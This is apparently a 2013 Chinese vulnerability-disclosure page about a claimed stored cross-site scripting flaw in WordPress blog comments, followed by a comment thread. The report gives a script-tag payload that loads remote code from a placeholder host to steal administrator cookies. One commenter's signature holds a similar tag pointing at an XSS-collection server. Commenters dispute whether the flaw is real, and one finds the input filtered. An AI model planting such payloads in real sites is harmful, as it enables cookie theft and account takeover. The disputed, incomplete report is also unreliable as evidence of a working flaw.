漏洞概要
关注数(24)
关注此漏洞
漏洞标题:WordPress博客评论功能存储型xss攻击
提交时间:2013-02-04 13:14
修复时间:2013-03-21 13:14
公开时间:2013-03-21 13:14
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:5
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2013-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
随便对一篇文章访问进行评论。加入<script src=xxx.com/xxxx </script>代码即可进行攻击
详细说明:
插入后。后台管理员看不见任何信息。这时候cookie
漏洞证明:
修复方案:
漏洞回应
漏洞评价:
评论
-
2013-02-04 17:39 |
云中鹰 ( 实习白帽子 | Rank:65 漏洞数:10 | 云中鹰)
如果没猜错的话,你犯了一个错误,就是你评论的时候,用的是管理员账号。。。
-
2013-02-04 18:06 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-02-05 09:37 |
云中鹰 ( 实习白帽子 | Rank:65 漏洞数:10 | 云中鹰)
@疯狗 是啊,wp目前来说不装插件是无敌的,所以我说洞主可能犯了个错误了,用管理员账号来测试跨站了。。。
-
2013-02-05 10:08 |
HuGtion ( 实习白帽子 | Rank:70 漏洞数:10 | 学习安全技术。)
@云中鹰 经测试非注册用户: <script src=xxx.com/xxxx </script> 这样的代码,后台审核看不出有什么问题,很容易躲过管理员的审核,Akismet插件也没有拦截。。。
-
2013-02-05 17:40 |
柒_Tam ( 路人 | Rank:5 漏洞数:2 | <script src="http://xss.wuaiql.com/?u=20...)
@疯狗 后台评论看不出什么破绽加上 代码后 后台审核时空白一片 随便加上几个文字 管理员会以为就是随便简单的评论。
-
2013-02-07 14:57 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-02-16 15:28 |
0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)
@柒_Tam 空白一片?那不是执行了??????????
-
2013-02-23 15:36 |
柒_Tam ( 路人 | Rank:5 漏洞数:2 | <script src="http://xss.wuaiql.com/?u=20...)
@0x0F 后台核审的时候只看见代码是空白的什么都没显示 随便加上字即可通过执行。在没通过之前代码没有执行
-
2013-03-21 13:22 |
VIP ( 普通白帽子 | Rank:759 漏洞数:100 )
@柒_Tam 测试了一下,后台确实空白一片,但是。。查看源代码发现似乎直接过滤了,没有xss代码,应该是直接过滤了,并不是执行了。
-
2013-03-21 17:36 |
lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)
-
2013-03-21 22:51 |
ZedeX ( 路人 | Rank:16 漏洞数:3 | zx)
-
2013-03-22 09:25 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-03-23 09:27 |
柒_Tam ( 路人 | Rank:5 漏洞数:2 | <script src="http://xss.wuaiql.com/?u=20...)
@lion(lp) 也许已经修复 ?还是浏览器什么滴。前几楼的洞友 前几个月测试还可以的。
-
2013-03-25 10:29 |
lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)